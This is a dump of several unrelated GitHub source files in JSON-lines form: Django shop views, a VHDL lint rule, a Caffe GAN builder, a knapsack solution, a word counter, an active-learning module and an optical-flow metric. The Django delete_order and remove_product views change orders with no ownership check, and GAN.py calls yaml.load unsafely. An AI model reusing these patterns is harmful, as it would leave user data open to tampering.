self.cart[prod_id]\n            request.session.modified = True\n            return redirect('/')\n        else:\n            return redirect('/')\n\n\nclass Checkout(View):\n    \"\"\"\n    Shipment details are fetched if they already exist; otherwise an\n    empty form is shown for the user to fill in\n    \"\"\"\n    def get(self, request):\n        form = ShipmentDetailForm()\n        if request.user.is_authenticated:\n            get_user_last_data = ShipmentDetail.objects.filter(\n                user=request.user)\n            if get_user_last_data:\n                instance = get_object_or_404(\n                    get_user_last_data, user=request.user)\n                form = ShipmentDetailForm(instance=instance)\n        return render(\n            request,\n            \"user_checkout.html\",\n            {\n                'form': form,\n            },\n        )\n\n    def post(self, request):\n        \"\"\"\n        Update the ShipmentDetail model form if needed, otherwise forward it\n        as is, then store the new order data in the ConfirmedOrderDetail and\n        UserBill models together with an invoice number.\n        \"\"\"\n        if request.user.is_authenticated:\n            get_user_last_data = ShipmentDetail.objects.filter(\n                user=request.user)\n            if request.session.get('cart'):\n                if get_user_last_data:\n                    instance = get_object_or_404(ShipmentDetail,\n                                                 user=request.user)\n                    form = ShipmentDetailForm(request.POST, instance=instance)\n                    if form.is_valid():\n                        fetch_user = form.save(commit=False)\n                        fetch_user.user = request.user\n                        messages.success(request,\n                                         'Shipment data set successfully')\n                        form.save()\n                    else:\n                        return redirect('checkout')\n                else:\n                    form = ShipmentDetailForm(request.POST)\n                    if form.is_valid():\n                        fetch_user = form.save(commit=False)\n                        fetch_user.user = request.user\n                        messages.success(request,\n                                         'Shipment data added successfully')\n                        form.save()\n                    else:\n                        messages.error(request,\n                                       'Your data was not saved')\n                        return render(\n                            request,\n                            'user_checkout.html',\n                            {\n                                'form': form\n                            })\n            else:\n                messages.success(self.request, 'Order already placed')\n                return redirect('myorders')\n        overall_total = 0.00\n        invoice_no = generate_invoice_number()\n\n        if not request.session.get('cart'):\n            messages.success(self.request, 'Order already placed')\n            return redirect('myorders')\n        else:\n            for key, value in 
request.session.get('cart').items():\n                    overall_total += value['prod_total']\n                    prod_id = Product.objects.get(id=key)\n                    product_quantity_update = Product.objects.filter(\n                        id=key).update(stock=F('stock') - value['quantity'])\n                    add_confirmed_order = ConfirmedOrderDetail(\n                        user_info=request.user,\n                        product_info=prod_id,\n                        quantity=value['quantity'],\n                        prod_total=value['prod_total'],\n                        user_unique_order_no=invoice_no\n                    )\n                    add_confirmed_order.save()\n\n                overall_total = round(5.00 + overall_total, 2)\n                user_shipment_id = ShipmentDetail.objects.get(user=request.user)\n                user_bill_ref = UserBill(\n                    user_info=request.user,\n                    shipment_info=user_shipment_id,\n                    total=overall_total,\n                    user_unique_order_no=invoice_no\n                )\n                user_bill_ref.save()\n                messages.success(request, 'Order placed successfully')\n                del request.session['cart']\n\n            return render(\n                request,\n                \"order_complete.html\",\n                {\n                    'form': form,\n                },\n            )\n\n\ndef generate_invoice_number():\n    \"\"\"\n    This function generates a random invoice number, checking that it\n    doesn't already exist in the model for new orders.\n    \"\"\"\n    is_not_unique = True\n    while is_not_unique:\n        invoice_no_ref = random.randint(1000000000, 9999999999)\n        if not ConfirmedOrderDetail.objects.filter(\n                user_unique_order_no=invoice_no_ref):\n            is_not_unique = False\n    return str(invoice_no_ref)\n\n\nclass MyOrders(View):\n    \"\"\"\n    This view shows the user's orders in My Orders; the user can also update\n    the quantity of a product as needed.\n    Note: Parts of the get function were modified using ChatGPT due to an\n    issue where form and products data couldn't be zipped together as a list.\n    Kindly see Testing.md bug#4 for more details.\n    \"\"\"\n    def get(self, request):\n        get_products = {}\n        form_instances = []\n        if request.user.is_authenticated:\n            get_invoice_list = UserBill.objects.filter(\n                user_info=request.user).values_list(\n                'user_unique_order_no', flat=True)\n            if get_invoice_list:\n                for invoice_number in get_invoice_list:\n                    products_data = ConfirmedOrderDetail.objects.filter(\n                        user_unique_order_no=invoice_number).values_list(\n                        'product_info',\n                        'product_info__image',\n                        'product_info__name',\n                        'quantity', 'prod_total',\n                        'product_info__stock',\n                    )\n                    form_instances_for_invoice = []\n                    for product_data in products_data:\n                        instance = get_object_or_404(\n                            ConfirmedOrderDetail,\n                            user_unique_order_no=invoice_number,\n                            product_info=product_data[0]\n                        )\n                        form = ConfirmedOrderDetailForm(instance=instance)\n                        form_instances_for_invoice.append(form)\n                    get_products[invoice_number] = {\n                        'product_info': products_data,\n                        'form_instances': form_instances_for_invoice,\n                    }\n                    form_instances.extend(form_instances_for_invoice)\n\n        return render(\n            request,\n            \"my_orders.html\",\n            {\n                'get_products': get_products,\n                'form_instances': form_instances,\n            },\n        )\n\n    def post(self, request):\n        if 'quantity' in request.POST:\n            quantity = request.POST['quantity']\n            confirmed_product_id = request.POST['product_instance_id']\n            product_id = ConfirmedOrderDetail.objects.get(\n                id=confirmed_product_id).product_info.id\n            product_total = Product.objects.get(\n                id=product_id).discount_name.discount_percentage\n            discount = 0\n            queryset = Product.objects.filter(\n                id=product_id).order_by('-created_on')\n            product = get_object_or_404(queryset)\n            if product.discount_name.discount_percentage > 0:\n                discount = (float(product.discount_name.discount_percentage)\n                            * float(product.price)) / 100\n                discount = product.price-decimal.Decimal(discount)\n            else:\n                discount = product.price\n            new_total = float(quantity) * 
float(discount)\n            instance = get_object_or_404(\n                ConfirmedOrderDetail, id=confirmed_product_id)\n            form = ConfirmedOrderDetailForm(request.POST, instance=instance)\n            if form.is_valid():\n                form.save()\n                ConfirmedOrderDetail.objects.filter(\n                    id=confirmed_product_id).update(prod_total=round(\n                        new_total, 2))\n                messages.success(request, 'Quantity updated successfully')\n                return redirect('myorders')\n        return self.get(request)\n\n\ndef delete_order(request, product_key):\n    \"\"\"\n    This view cancels the orders\n    \"\"\"\n    order_detail = ConfirmedOrderDetail.objects.filter(\n        user_unique_order_no=product_key)\n    user_bill = UserBill.objects.filter(user_unique_order_no=product_key)\n    order_detail.delete()\n    user_bill.delete()\n    messages.success(request, 'Order cancelled successfully')\n    return redirect('myorders')\n\n\ndef remove_product(request, product_key, total, prod_id):\n    \"\"\"\n    This view removes products from orders\n    \"\"\"\n    item = UserBill.objects.filter(\n        user_unique_order_no=product_key).values_list(\n            'total', flat=True)\n    update_total = float(item[0]) - float(total)\n    update_user_bill = UserBill.objects.filter(\n        user_unique_order_no=product_key).update(total=update_total)\n    order_detail = ConfirmedOrderDetail.objects.filter(\n        user_unique_order_no=product_key).filter(product_info__id=prod_id)\n    order_detail.delete()\n    messages.success(request, 'Item removed successfully')\n    return redirect('myorders')\n","repo_name":"MBilalQureshi/cosmos-beauty-pp4","sub_path":"ecommerce/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"22946511283","text":"\nfrom vsg.rules import align_tokens_in_region_between_tokens as Rule\n\nfrom vsg import token\n\nlAlign = []\nlAlign.append(token.association_element.assignment)\n\noBegin = token.procedure_call.open_parenthesis\noEnd = token.procedure_call.close_parenthesis\n\n\nclass rule_401(Rule):\n    '''\n    This rule checks the alignment of :code:`=>` keywords in procedure calls.\n\n    |configuring_keyword_alignment_rules_link|\n\n    **Violation**\n\n    .. code-block:: vhdl\n\n       connect_ports(\n          port_1=> data,\n          port_2 => enable,\n          port_3 => overflow,\n          port_4 => underflow\n       );\n\n    **Fix**\n\n    .. 
code-block:: vhdl\n\n       connect_ports(\n          port_1 => data,\n          port_2 => enable,\n          port_3 => overflow,\n          port_4 => underflow\n       );\n    '''\n\n    def __init__(self):\n        Rule.__init__(self, 'procedure_call', '401', lAlign, oBegin, oEnd)\n        self.solution = 'Align =>.'\n        self.subphase = 2\n        self.bIncludeTillBeginningOfLine = True\n","repo_name":"jeremiah-c-leary/vhdl-style-guide","sub_path":"vsg/rules/procedure_call/rule_401.py","file_name":"rule_401.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":150,"dataset":"github-code","pt":"61"}
+{"seq_id":"39242819051","text":"#!/usr/bin/env python\n##########################################################\n# File Name: GAN.py\n# Author: gaoyu\n# mail: gaoyu14@pku.edu.cn\n# Created Time: 2018-04-30 23:12:56\n##########################################################\n\nimport os  # save_proto uses os.path; made explicit rather than relying on the star import below\nimport yaml\nfrom pycaffe import *\n\nimport data_layer.illu_data\nimport cnn\nimport loss\n\nclass GAN:\n    def __init__(self, args):\n        self.param = yaml.load(open(args.net, 'r'))\n        self.name = args.net.replace(\".yaml\", \"\")\n        self.prefix = args.o\n\n    def save_proto(self, net, token):\n        fname = os.path.join(self.prefix, token + \".prototxt\")\n        with open(fname, 'w') as f:\n            f.write(str(net.to_proto()))\n\n    def make_data(self, mode):\n        return data_layer.illu_data.illu_data(config = self.param, mode = mode)\n\n    def make_cnn(self, session, freeze, mode):\n        Type = self.param['net'][self.param['net'][session]][\"type\"]\n        builder = getattr(cnn, Type)(session, self.param['net'], mode = mode)\n        builder.freeze = freeze\n        builder.use_global_stats = (mode != \"training\") or (freeze)\n        return builder.build\n\n    def make_loss(self, net, session, label, data, pic, cls):\n        loss.GeneratorLoss(net, self.param).add_loss(label, data, pic)\n        loss.ClassfierLoss(net, self.param).add_loss(cls, session)\n\n    def deploy_net(self):\n        mode = \"deploy\"\n        freeze = True\n        net = caffe.NetSpec()\n        data, label = self.make_data(mode)\n        output = self.make_cnn(\"G\", freeze, mode)(data)\n        net.Output = output\n        self.save_proto(net, \"deploy\")\n\n    def concat_label_output(self, label, output):\n        # build cls label with batch_size * 2\n        return L.Concat(label, output,\n                name = \"ClsData\",\n                concat_param = dict(axis = 0),\n                propagate_down = [0, 1])\n\n    def trainG_net(self):\n        mode = \"training\"\n        net = caffe.NetSpec()\n        data, label = self.make_data(mode)\n        output = self.make_cnn(\"G\", False, mode)(data)\n        net.Output = output\n        concat = self.concat_label_output(label, output)\n        cls = self.make_cnn(\"P\", True, mode)(concat)\n        net.Cls = cls\n        self.make_loss(net, \"G\", label, data, output, cls)\n        self.save_proto(net, \"trainG\")\n\n    def trainP_net(self):\n        mode = \"training\"\n        net = caffe.NetSpec()\n        data, label = self.make_data(mode)\n        output = self.make_cnn(\"G\", True, mode)(data)\n        net.Output = output\n        concat = self.concat_label_output(label, output)\n        cls = self.make_cnn(\"P\", False, mode)(concat)\n        net.Cls = cls\n        self.make_loss(net, \"P\", label, data, output, cls)\n        self.save_proto(net, \"trainP\")\n\n    def __call__(self):\n        self.deploy_net()\n        self.trainG_net()\n        self.trainP_net()\n","repo_name":"bacTlink/caffe_illu","sub_path":"net/gan/GAN.py","file_name":"GAN.py","file_ext":"py","file_size_in_byte":2842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"18891290611","text":"import sys\n\ninput = sys.stdin.readline\n\nN, T = map(int, input().split())\n\nsubj = [tuple(map(int, input().split())) for _ in 
range(N)]\n\nD = [[0] * (T + 1) for _ in range(N + 1)]\n\nfor t in range(1, T + 1):\n for i in range(1, N + 1):\n if t - subj[i - 1][0] >= 0:\n D[i][t] = max(D[i - 1][t], D[i - 1][t - subj[i - 1][0]] + subj[i - 1][1])\n else:\n D[i][t] = max(D[i - 1][t], D[i][t - 1])\n\nprint(D[-1][-1])","repo_name":"JeonghakLee/AlgorithmStudy","sub_path":"Pangpyo/[BOJ]-14728.py","file_name":"[BOJ]-14728.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37478975354","text":"#\n# Pulls all of the contents from each of the URLs in the 'urls' list,\n# and returns what appears to be the favorite word, where the\n# metric for what favorite means is outlined above\n#\n\ndef getFavoriteWord(urls):\n import urllib.request\n import re\n import operator\n from operator import itemgetter\n\n responseText = urllib.request.urlopen(urls)\n dic_result = {}\n\n for line in responseText:\n line = line.decode('utf-8') # Decoding the binary data to text.\n words = line.split()\n \t# print(words)\n for i,f in enumerate(words):\n f = f.replace(\"\\\"\", \"\")\n f = re.sub(\"[',;.?!())]\", '', f) #replace char like ...\n \t\t# Check if word is lowercase\n if(f.islower()):\n \t\t\t# check if word is in dictionary yet or not\n if(f in dic_result):\n dic_result[f] = dic_result[f] + 1\n else:\n dic_result[f] = 1\n\n # for w in sorted(set(dic_result)):\n # print(w + \": \" + str(dic_result[w]))\n\n for w in sorted(dic_result, key=dic_result.get, reverse=True):\n print(w + \": \"+ str(dic_result[w]))\n\n # htmlSource = responseText.read()\n # print(dic_result)\n responseText.close()\n # print(htmlSource)\n\ngetFavoriteWord(\"http://www.gutenberg.org/files/5200/5200.txt\")\n","repo_name":"nakayamaqs/PythonModule","sub_path":"Assignment/favword.py","file_name":"favword.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12832982836","text":"## @file\n# Active learning module: Functions for facilitating active (and passive) learning\n# by Anna Andraszek\n\nimport time\nfrom IPython import display\nimport paths\nfrom PIL import Image, ImageDraw\n\nimport textractor.textloading\nfrom textractor import textloading\nimport re\nimport img2pdf\nfrom pdf2image import convert_from_path, exceptions\nimport os\nimport numpy as np\nfrom modAL.models import ActiveLearner\nfrom modAL.uncertainty import uncertainty_sampling\nfrom sklearn.ensemble import RandomForestClassifier\nimport pandas as pd\nimport json\nimport sklearn\nfrom report import machine_learning_helper as mlh\nfrom borehole import tables\nimport random\n\n\n## Gets input from the console and checks its validity\n# @param classes array of ints representing classes\n# @return valid user input for a class\ndef get_input(classes):\n y = -1\n while y not in classes:\n print(\"Enter one of: \", str(classes))\n y = input()\n try:\n y = int(y) # set it as int here instead of on input to avoid error breaking execution when input is bad\n except:\n continue\n return y\n\n\n## Displays part of a page in python notebook\n# @param docid Unique identifying int of report\n# @param page page number\n# @param line line number\n# @param mode A string indicating the 'version' of the model - can be a name, or 'production'\ndef display_page(docid, page, line=None, mode=paths.dataset_version):\n pg_path = paths.get_report_page_path(int(docid), int(page)) # docid, page\n image = Image.open(pg_path)\n 
width, height = image.size\n\n if line:\n draw = ImageDraw.Draw(image, 'RGBA')\n draw.line([(1, 1), (1, height-3)], fill=\"blue\", width=3) # draw parallel lines down the page\n draw.line([(width-3, 1), (width-3, height-3)], fill=\"blue\", width=3)\n\n docinfofile = paths.get_restructpageinfo_file(docid)\n docinfo = json.load(open(docinfofile, \"r\"))\n pageinfo = docinfo[str(page)]\n lineinfo = pageinfo[int(line)-1] #-1 because linenum starts from 1\n\n box = lineinfo['BoundingBox']\n ln_left = width * box['Left']\n ln_top = height * box['Top']\n\n crop_height = height / 3\n left = 0\n right = width\n top = ln_top - box['Height'] - (crop_height/2) # bottom > top bc of coordinate system\n bottom = ln_top + (crop_height/2)\n\n if top < 0: # if top is outside of bounds, add to it to make it 0, and sub from bottom\n change = top\n top = 0\n bottom -= change\n draw.line([(1, 1), (width-3, 1)], fill=\"blue\", width=3)\n\n elif bottom > height:\n change = bottom - height\n bottom = height\n top -= change\n draw.line([(1, height-3), (width-3, height-3)], fill=\"blue\", width=3)\n\n draw.rectangle([ln_left, ln_top, ln_left + (width * box['Width']), ln_top + (height * box['Height'])], outline='green', width=2)\n\n crop_image = image.crop((left, top, right, bottom))\n #crop_ln_top = crop_height * box['Top']\n\n #draw.rectangle([ln_left, crop_ln_top, ln_left + (width * box['Width']), crop_ln_top + (crop_height * box['Height'])], outline='green')\n image = crop_image\n\n display.display(image)\n # line option: draw a box around the line\n # get docinfo, query the line number and bounding box\n # crop page to about 1/3 of it to make it more focused on the line\n\n print(pg_path)\n if line: print(\"line: \", line)\n\n## Used instead of uncertainty sampling when classifying borehole tables, because uncertainty sampling will sample inputs with UNK tokens.\n# This sampling method looks for specific words and gets a random set of n_queries of inputs containing these.\n# @param pool Dataframe of unlabelled samples\n# @param n_queries how many are to be sampled\n# @return idx, inst: indices of samples and samples\ndef borehole_sample(pool, n_queries):\n hole_words = ['hole', 'bore', 'well', 'core']#, 'drill']\n hole_pool = []\n for word in hole_words:\n word_pool = [(x, idx) for x, idx in zip(pool.iloc[:,0], pool.index.values) if word in x]\n hole_pool.extend(word_pool)\n hole_pool = set(hole_pool)\n hole_pool = list(hole_pool)\n sample = random.sample(hole_pool, n_queries)\n idx = np.asanyarray([i[1] for i in sample])\n inst = np.asanyarray([i[0] for i in sample])\n #idx.shape = (idx.shape[0], 1)\n inst.shape = (inst.shape[0], 1)\n return idx, inst\n\n## Allows user to annotate data in notebook, when there is unlabelled data, and then train the model with those annotations included.\n# Data given to label is that which has most uncertain label to the model.\n# Can be used to try to incrementally improve model with previously unlabelled data, but can also be a good way of labelling\n# data as it presents it in its original context, wheras the contents of the csv the dataset resides in may be also transformed / not have context.\n# Can be slow - as it gets and displays images.\n# Must be run in python notebook to view images. 
(However, can change display function to disply image in pop up.)\n# @param data A dataset stored as a pandas DataFrame\n# @param n_queries Number of points of data to label in active learning\n# @param y_column The name of the column containing y values\n# @param estimator The model to train. Currently use scikit-learn and keras models.\n# @param limit_cols Columns in the dataset to exclude from x\n# @param mode A string indicating the 'version' of the model - can be a name, or 'production'\n# @return labelled data, accuracy of model, trained model\ndef active_learning(data, n_queries, y_column, estimator=RandomForestClassifier(), limit_cols=None, mode=paths.dataset_version):\n line = False\n if y_column in ['Marginal', 'Heading']: # covers marginal_lines, heading_id_toc, heading_id_intext\n line = True # determines if a line or page is to to be displayed\n classes = pd.unique(data[y_column].values) #todo: check type\n classes = sorted(filter(lambda v: v==v, classes))\n X_initial, Y_initial, X_pool, y_pool, refs = al_data_prep(data, y_column, limit_cols, mode)\n if mode == paths.production:\n test_percentage = 0\n else:\n test_percentage = 0.2\n if 'lstm' in estimator.named_steps:\n test_size = int(X_initial.shape[0] * test_percentage)\n X_train, y_train = X_initial[:-test_size], Y_initial[:-test_size]\n X_test, y_test = X_initial[-test_size:], Y_initial[-test_size:]\n else:\n X_train, X_test, y_train, y_test = sklearn.model_selection.train_test_split(X_initial, Y_initial,\n test_size=test_percentage)\n learner = ActiveLearner(estimator=estimator, #ensemble.RandomForestClassifier(),\n query_strategy=uncertainty_sampling,\n X_training=X_train.values, y_training=y_train.astype(int))\n accuracy_scores = [learner.score(X_test, y_test.astype(int))]\n if 'boreholes' not in mode:\n query_idx, query_inst = learner.query(X_pool, n_instances=n_queries)\n query_idx = np.asarray([refs['idx'][i] for i in query_idx])\n else:\n query_idx, query_inst = borehole_sample(X_pool, n_queries)\n y_new = np.zeros(n_queries, dtype=int)\n time.sleep(5)\n for i in range(n_queries):\n idx = query_idx[i]\n #page=int(query_inst[i][0])\n if 'boreholes' not in mode:\n page = refs['pagenums'].loc[idx]\n if line:\n line=refs['linenums'].loc[idx]\n if 'boreholes' in mode:\n page = refs['Tables'].loc[idx]\n y = al_input_loop(learner, query_inst[i], refs['docids'].loc[idx], n_queries, classes, page=page, line=line, mode=mode)\n y_new[i] = y\n #print(\"index: \", idx)\n #print(\"x: \", data.at[idx, 'Columns'])\n data.at[idx, y_column] = y # save value to copy of data\n data.at[idx, 'TagMethod'] = 'manual'\n\n learner.teach(query_inst, y_new) # reshape 1, -1\n accuracy_scores.append(learner.score(X_test, y_test.astype(int)))\n preds = learner.predict(X_test)\n #print(\"End of annotation. Samples, predictions, annotations: \")\n #print(ref_docids.iloc[query_idx].values,\n # np.concatenate((query_inst, np.array([preds]).T, y_new.reshape(-1, 1)), axis=1))\n print(sklearn.metrics.confusion_matrix(preds, y_test.astype(int)))\n accuracy = accuracy_scores[-1]\n print(accuracy)\n return data, accuracy, learner\n\n## When there is no unlabelled data, the model is trained without active learning.\n# @param data A dataset stored as a pandas DataFrame\n# @param y_column The name of the column containing y values\n# @param estimator The model to train. 
Currently use scikit-learn and keras models.\n# @param limit_cols Columns in the dataset to exclude from x\n# @param mode A string indicating the 'version' of the model - can be a name, or 'production'\n# @return accuracy, trained model\ndef passive_learning(data, y_column, estimator=sklearn.ensemble.RandomForestClassifier(), limit_cols=None, mode=paths.dataset_version):\n print(\"training with all labelled samples\")\n data = data.dropna(subset=[y_column])\n default_drop = ['DocID', 'TagMethod']\n if limit_cols:\n default_drop.extend(limit_cols)\n X, Y = mlh.data_prep(data, limit_cols=default_drop, y_column=y_column)\n if paths.production in mode:\n X_train, X_test, y_train, y_test = X, X, Y, Y # no split test set\n else:\n test_percentage = 0.2\n print(\"test set size: \", test_percentage)\n X_train, X_test, y_train, y_test = sklearn.model_selection.train_test_split(X, Y, test_size=test_percentage)\n #X, Y = X.astype(int), Y.astype(int) # pd's Int64 dtype accepts NaN # but Int64 dtype is \"unknown\" # need to change this line to accept with str input, not sure how\n\n learner = estimator.fit(X_train, y_train)\n # y_pred = learner.predict(X_test)\n # accuracy = sklearn.metrics.accuracy_score(y_test, y_pred)\n if 'TagMethod' in data.columns:\n valid_set = data.loc[(data['TagMethod'] == \"manual\") | (data['TagMethod'] == \"legacy\")]\n else:\n valid_set = data # for legacy dataset\n valid_x, valid_y = mlh.data_prep(valid_set, y_column=y_column, limit_cols=default_drop)\n valid_y = valid_y.astype(int)\n # valid_x = valid_set.drop(columns=['DocID', 'TOCPage', \"TagMethod\"])\n y_pred = learner.predict(valid_x)\n accuracy = sklearn.metrics.accuracy_score(valid_y, y_pred)\n conf = sklearn.metrics.confusion_matrix(valid_y, y_pred)\n print(\"Test set results: \")\n pred = learner.predict(X_test)\n print(sklearn.metrics.accuracy_score(y_test, pred))\n print(sklearn.metrics.confusion_matrix(y_test, pred))\n print(\"For manually annotated:\")\n print(accuracy)\n print(conf)\n\n # print false negatives\n # print('False negatives: ')\n # for i in range(len(valid_y)):\n # if valid_y.iloc[i] != y_pred[i]:\n # if y_pred[i] == 0:\n # print(valid_x.iloc[i])\n\n\n return accuracy, learner\n\n## Train a model\n# @param data A dataset stored as a pandas DataFrame\n# @param y_column The name of the column containing y values\n# @param n_queries Number of points of data to label in active learning\n# @param estimator The model to train. 
Currently use scikit-learn and keras models.\n# @param datafile The filename of the dataset in 'data'\n# @param limit_cols Columns in the dataset to exclude from x\n# @param mode A string indicating the 'version' of the model - can be a name, or 'production'\n# @return accuracy, trained model\ndef train(data, y_column, n_queries, estimator, datafile, limit_cols=None, mode=paths.dataset_version):\n unlabelled = data[y_column].loc[data[y_column].isnull()]\n\n if len(unlabelled) < n_queries: # if less unlabelled than want to sample, reduce sample size\n if len(unlabelled) == 0:\n data[y_column].loc[data['TagMethod'] == 'auto'] = np.nan\n else:\n n_queries = len(unlabelled)\n\n if n_queries > 0:\n updated_data, accuracy, learner = active_learning(data, n_queries, y_column, estimator, limit_cols, mode)\n updated_data.to_csv(datafile, index=False) # save slightly more annotated dataset\n else:\n accuracy, learner = passive_learning(data, y_column, estimator, limit_cols, mode)\n return accuracy, learner\n\n## Adds labels to unlabelled members of a dataset using predictions from its respective model, and saves to the same file.\n# @param type name of the model\n# @param classification_function function inside the model which acts like predict()\n# @param y_column The name of the column containing y values\n# @param mode A string indicating the 'version' of the model - can be a name, or 'production'\ndef automatically_tag(type, classification_function, y_column, mode=paths.dataset_version):\n source = paths.get_dataset_path(type, mode) # 'toc'\n df = pd.read_csv(source)\n df = df.reset_index(drop=True)\n new_tags = classification_function(df, masked=False) # can add mode parameter if ever use it on production set\n #idx = df.loc[((df['TagMethod'] != 'legacy') != (df['TOCPage'] == df['TOCPage'])) & (df['TagMethod'] != 'manual')].index.values #= new_tags.loc[(df['TagMethod'] != 'legacy') & (df['TagMethod'] != 'manual')]\n idx = df.loc[((df['TagMethod'] == 'auto') | (df['TagMethod'] != df['TagMethod'])) | (df[y_column] != df[y_column])].index.values # join of auto and TOCPage==None\n df.loc[idx, y_column] = new_tags.loc[idx]\n df.loc[idx, 'TagMethod'] = 'auto'\n print(len(idx), \" automatically tagged\")\n #df['TagMethod'].loc[(df['TagMethod'] != 'legacy') & (df['TagMethod'] != 'manual')] = 'auto'\n if 'proba' in df.columns:\n df = df.drop(columns=['proba'])\n df.to_csv(source, index=False)\n\n## Displays a borehole table\n# @param docid Unique identifying int of report\n# @param table Table number\ndef display_df(docid, table):\n dfs = tables.get_tables(docid)\n df = dfs[table-1]\n pd.set_option('display.max_rows', 500)\n pd.set_option('display.max_columns', 500)\n pd.set_option('display.width', 1000)\n #display.display(df)\n print(df)\n print()\n print(docid, \"table: \", table-1)\n print()\n\n## Active learning user input loop\n# @param learner The model to train. 
Currently use scikit-learn and keras models.\n# @param inst unlabelled samples\n# @param docid Unique identifying int of report\n# @param n_queries number of samples\n# @param classes array of ints representing classes\n# @param page page number\n# @param line line number\n# @param mode A string indicating the 'version' of the model - can be a name, or 'production'\n# @return user input class\ndef al_input_loop(learner, inst, docid, n_queries, classes, page=None, line=None, mode=paths.dataset_version):\n print(\"Waiting to display next....\")\n display.clear_output(wait=True)\n #print(inst)\n\n pred = learner.predict(inst.reshape(1, -1))\n #preds.append(pred[0])\n\n if mode != 'boreholes':\n display_page(int(docid), int(page), line) # docid, pagenum, line\n else:\n display_df(int(docid), int(page))\n #print(inst)\n\n time.sleep(1) # sometimes the input box doesn't show, i think because it doesn't have the time\n\n print(\"queries: \", n_queries)\n #if i == 0:\n # print(\"predict proba of all samples\")\n # print(learner.predict_proba(query_inst))\n #else:\n print(\"predict proba of this sample: \", learner.predict_proba([inst]))\n print(\"Prediction: \", pred)\n #print('Is this page a Table of Contents?')\n # print(pg_path)\n print()\n y = get_input(classes)\n return y\n\n\n## Active learning data prep\n# @param data A dataset stored as a pandas DataFrame\n# @param y_column The name of the column containing y values\n# @param limit_cols Columns in the dataset to exclude from x\n# @param mode A string indicating the 'version' of the model - can be a name, or 'production'\n# @return labelled and unlabelled x and y samples, and original reference to pagenums, linenums, tablenums, where applicable\ndef al_data_prep(data, y_column, limit_cols=None, mode=paths.dataset_version): # to generalise further, should take limit_cols param and generalise data_prep\n default_drop = ['DocID', 'TagMethod']\n if not limit_cols:\n limit_cols = default_drop\n else:\n limit_cols.extend(default_drop)\n\n unlabelled = data.loc[data[y_column].isnull()]\n labelled = data.dropna(subset=[y_column]) # assume that will contain 0, 1 values\n X_initial, Y_initial = mlh.data_prep(labelled, limit_cols=limit_cols, y_column=y_column)\n\n refs = {}\n ref_docids = unlabelled.DocID # removing docids from X, but keeping them around in this to ref\n refs['docids'] = ref_docids\n if y_column in ['Heading', 'Marginal']:\n ref_pagenums = unlabelled.PageNum\n refs['pagenums'] = ref_pagenums\n if y_column in ['Heading', 'Marginal']:\n ref_linenums = unlabelled.LineNum\n refs['linenums'] = ref_linenums\n if mode=='boreholes':\n refs['Tables'] = unlabelled.TableNum\n\n X_pool, y_pool = mlh.data_prep(unlabelled, limit_cols=limit_cols, y_column=y_column)\n ref_idx = X_pool.index.values\n refs['idx'] = ref_idx\n X_pool.dropna(inplace=True)\n #X_pool, y_pool = X_pool.to_numpy(), y_pool.to_numpy() # COMMENT OUT FOR DEBUG\n return X_initial, Y_initial, X_pool, y_pool, refs\n\n\n## Saves pages of a document as individual images. 
This makes the display of a page faster, as the file to be opened is much smaller.\n# @param docid Unique identifying int of report\n# @param report_num File number\ndef save_report_pages(docid, report_num=1):\n report_path = paths.get_report_name(docid, local_path=True, file_extension='.pdf', file_num=report_num)\n try:\n images = convert_from_path(report_path)\n except exceptions.PDFPageCountError:\n fname = textractor.textloading.find_file(docid)\n rep_folder = (paths.get_report_name(docid, local_path=True, file_num=report_num)).split('cr')[0]\n if not os.path.exists(rep_folder):\n os.mkdir(rep_folder)\n\n if '.tif' in fname:\n report_in = re.sub('.pdf', '.tif', report_path)\n textloading.download_report(fname, report_in)\n with open(report_path, \"wb\") as f:\n f.write(img2pdf.convert(open(report_in, \"rb\")))\n else:\n textloading.download_report(fname, report_path)\n images = convert_from_path(report_path)\n\n for i in range(len(images)):\n pgpath = paths.get_report_page_path(docid, i + 1)\n images[i].save(pgpath)\n\n\n# if __name__ ==\"__main__\":\n# #display_page('70562', 5, 4)\n# import heading_id_toc\n# automatically_tag('proc_heading_id_toc', heading_id_toc.get_toc_headings, 'Heading')\n\n#\n# if __name__ == \"__main__\":\n# sample = textloading.get_reportid_sample(1000, cutoffdate=None)\n# #p = subprocess.Popen([], cwd=\"C:/Users/andraszeka/OneDrive - ITP (Queensland Government)/gsq-boreholes/\")\n# #subprocess.call(\"cd C:/Users/andraszeka/OneDrive - ITP (Queensland Government)/gsq-boreholes/\")\n# for id in sample:\n# print(\"aws s3 cp s3://gsq-horizon/QDEX/\" + id + \" 1000sample/\" + id + \" --recursive\")\n# #cmd = \"aws s3 cp s3://gsq-horizon/QDEX/\" + id + \" 1000sample/\" + id + \"--recursive\"\n# #subprocess.call(cmd)\n\n\n\n# def data_prep(data, limit_cols=None, y_column=None): # y=False,\n# X = data\n# if limit_cols:\n# #X = X.drop(columns=limit_cols)\n# for col in limit_cols:\n# try:\n# X = X.drop(columns=[col])\n# except:\n# print('column ', col, \" doesn't exist in X\") # makes it ok to accidentally have multiple of the same col in limit_cols\n# if y_column:\n# X = X.drop(columns=[y_column])\n# Y = data[y_column]\n# return X, Y\n# return X\n\n\n\n","repo_name":"annaandraszek/anna-gsq-boreholes","sub_path":"textracting/report/active_learning.py","file_name":"active_learning.py","file_ext":"py","file_size_in_byte":19858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31302746108","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef msen(flow: np.ndarray, gt: np.ndarray, plot: bool = False) -> float:\n \"\"\"\n Mean squared error in non occluded areas\n :param flow\n :param gt\n :return:\n \"\"\"\n\n flow_uv = flow[:, :, 0:2]\n gt_uv = gt[:, :, 0:2]\n\n idx_zeros = gt[:, :, 2] == 0\n\n sen = np.linalg.norm(flow_uv - gt_uv, axis=2)\n\n if plot:\n plt.figure()\n plt.title('Histogram of errors')\n plt.hist(sen[np.logical_not(idx_zeros)], 25)\n 